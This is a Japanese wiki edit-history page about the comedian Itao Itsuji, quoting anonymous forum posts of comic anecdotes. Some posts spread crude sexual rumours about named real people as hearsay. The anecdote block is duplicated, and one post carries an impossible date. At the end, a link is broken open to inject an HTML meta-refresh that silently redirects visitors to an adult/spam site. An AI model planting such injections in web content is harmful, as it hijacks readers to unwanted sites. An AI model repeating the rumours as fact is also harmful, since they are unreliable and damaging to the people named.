板尾 創路

「板尾 創路」の編集履歴(バックアップ)一覧はこちら

板尾 創路」の最新版変更点

追加された行は緑色になります。

削除された行は赤色になります。

44名前: 名無しさん投稿日: 2006/03/20(月) 03:47:53 松本 ベランダで立ちバック、女に、下を歩く人に「この辺、タバコ売ってる所ないですか?」と聞かす。 浜田 小学生の頃に八代亜紀が神社の境内で裸で吊るされてる所を想像してオナニー 板尾 ナンパした女の子に「この部屋で待ってて」と言い隣の部屋からその子を見ながらオナニー 603名前: 名無しさん投稿日: 2006/03/20(月) 22:10:52 板尾 松本が新聞広告の片隅でみつけた穴場的な風俗店にいくと、 必ず先に板尾がきていたという話がある。 独身時代、松本が板尾の家に遊びに行ったら、 テレビの上に性行為用のローションが普通に置かれていたらしい。 デパート内の家具屋のベッドコーナーで、 50代過ぎのおばさんとベッドを見ていた目撃談あり。 風俗嬢に行為の後、おしっこを売って欲しいと交渉を持ちかけたという話もある 701名前: 名無しさん投稿日: 2006/03/20(月) 23:36:27 板尾 出前の暖かいソバを半分くらい食べてから、「オレ冷たいやつ頼んだよな?」 エビフライ定食を頼んで、エビフライを残す パイプ椅子に貼られていた「関係者席」の紙を背中につけたまま喫茶店へ 甲子園で7回裏に風船を飛ばしたら、9回表に板尾の頭に落ちてくる(リアクションなし) 299 名前: 名無しさん投稿日: 2006/03/21(火) 18:53:02 板尾は台本に書いてある「ミライ(未来)」をずっと 「ミイラ」と読み続けたまま稽古。しかもわりと長セリフ。 後輩が「板尾さん、ミライです」と指摘したら 「ああ」と言って気付いた。 こないだのガキ使で松本が言ってた。既出かも。ゴメソ 546 名前: 名無しさん 投稿日: 2006/03/24(金) 23:31:06 板尾の話 ホテルに戻ってきたときに、鍵をカウンターに叩きつけて自分の部屋に戻っていった(当然開けられずに引き返してきた) テレビの12chを表示させるのに、1chから12chまで順送りする ワンルームなのにトレーラーで引越し。隅に荷物がちょこん。「これしかなかったんや」 かがんで靴紐を結んでいたら、後ろにころんと倒れた 右利きの板尾、「野球やりたいなあ」と言って両こぶしをぱんぱんするも、グラブが右手にはまっている 中学生の修学旅行団体が勝手に写真を撮り始めたので、カメラを取り上げ投げ壊した。 さんざん罵倒した女性と次の日手を繋いで歩いていた。 なんか和む 69 :名無しさん :2006/03/32(土) 06:35:05 千原ジュニアによる130R、板尾創路のエピ。 ジュニアと映画で共演した際、三階建ての旅館の三階に泊まっていた二人。 たまたま撮影が早く終わったその日、二人は旅館の近くの居酒屋でメシを食うことに。 普段、撮影の際には必ず鍵をフロントに預けて出かけるのだが、今日はどうする?と聞かれ、 「いや、すぐそこなんで、預けんと持ってったらええんちゃいます?」とジュニア。 そうか、と言うことで鍵をポケットに閉まって二人は食事を済ませ、 旅館に帰ってきた板尾、何故か堂々とした仕草でポケットから鍵を出し、 フロントにドーン!と置き、「…ええええええ!?」と硬直するジュニアを置いてそのまま部屋に。 二階の踊り場で「…あ、ちゃうわ」と少しも慌てずに呟いたらしい。
44名前: 名無しさん投稿日: 2006/03/20(月) 03:47:53 松本 ベランダで立ちバック、女に、下を歩く人に「この辺、タバコ売ってる所ないですか?」と聞かす。 浜田 小学生の頃に八代亜紀が神社の境内で裸で吊るされてる所を想像してオナニー 板尾 ナンパした女の子に「この部屋で待ってて」と言い隣の部屋からその子を見ながらオナニー 603名前: 名無しさん投稿日: 2006/03/20(月) 22:10:52 板尾 松本が新聞広告の片隅でみつけた穴場的な風俗店にいくと、 必ず先に板尾がきていたという話がある。 独身時代、松本が板尾の家に遊びに行ったら、 テレビの上に性行為用のローションが普通に置かれていたらしい。 デパート内の家具屋のベッドコーナーで、 50代過ぎのおばさんとベッドを見ていた目撃談あり。 風俗嬢に行為の後、おしっこを売って欲しいと交渉を持ちかけたという話もある 701名前: 名無しさん投稿日: 2006/03/20(月) 23:36:27 板尾 出前の暖かいソバを半分くらい食べてから、「オレ冷たいやつ頼んだよな?」 エビフライ定食を頼んで、エビフライを残す パイプ椅子に貼られていた「関係者席」の紙を背中につけたまま喫茶店へ 甲子園で7回裏に風船を飛ばしたら、9回表に板尾の頭に落ちてくる(リアクションなし) 299 名前: 名無しさん投稿日: 2006/03/21(火) 18:53:02 板尾は台本に書いてある「ミライ(未来)」をずっと 「ミイラ」と読み続けたまま稽古。しかもわりと長セリフ。 後輩が「板尾さん、ミライです」と指摘したら 「ああ」と言って気付いた。 こないだのガキ使で松本が言ってた。既出かも。ゴメソ 546 名前: 名無しさん 投稿日: 2006/03/24(金) 23:31:06 板尾の話 ホテルに戻ってきたときに、鍵をカウンターに叩きつけて自分の部屋に戻っていった(当然開けられずに引き返してきた) テレビの12chを表示させるのに、1chから12chまで順送りする ワンルームなのにトレーラーで引越し。隅に荷物がちょこん。「これしかなかったんや」 かがんで靴紐を結んでいたら、後ろにころんと倒れた 右利きの板尾、「野球やりたいなあ」と言って両こぶしをぱんぱんするも、グラブが右手にはまっている 中学生の修学旅行団体が勝手に写真を撮り始めたので、カメラを取り上げ投げ壊した。 さんざん罵倒した女性と次の日手を繋いで歩いていた。 なんか和む 69 :名無しさん :2006/03/32(土) 06:35:05 千原ジュニアによる130R、板尾創路のエピ。 ジュニアと映画で共演した際、三階建ての旅館の三階に泊まっていた二人。 たまたま撮影が早く終わったその日、二人は旅館の近くの居酒屋でメシを食うことに。 普段、撮影の際には必ず鍵をフロントに預けて出かけるのだが、今日はどうする?と聞かれ、 「いや、すぐそこなんで、預けんと持ってったらええんちゃいます?」とジュニア。 そうか、と言うことで鍵をポケットに閉まって二人は食事を済ませ、 旅館に帰ってきた板尾、何故か堂々とした仕草でポケットから鍵を出し、 フロントにドーン!と置き、「…ええええええ!?」と硬直するジュニアを置いてそのまま部屋に。 二階の踊り場で「…あ、ちゃうわ」と少しも慌てずに呟いたらしい。 [[@wikiへ>http://kam.jp"><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://esthe.pink.sh/r/]]

表示オプション

横に並べて表示:
変化行の前後のみ表示:
ツールボックス

下から選んでください:

新しいページを作成する
ヘルプ / FAQ もご覧ください。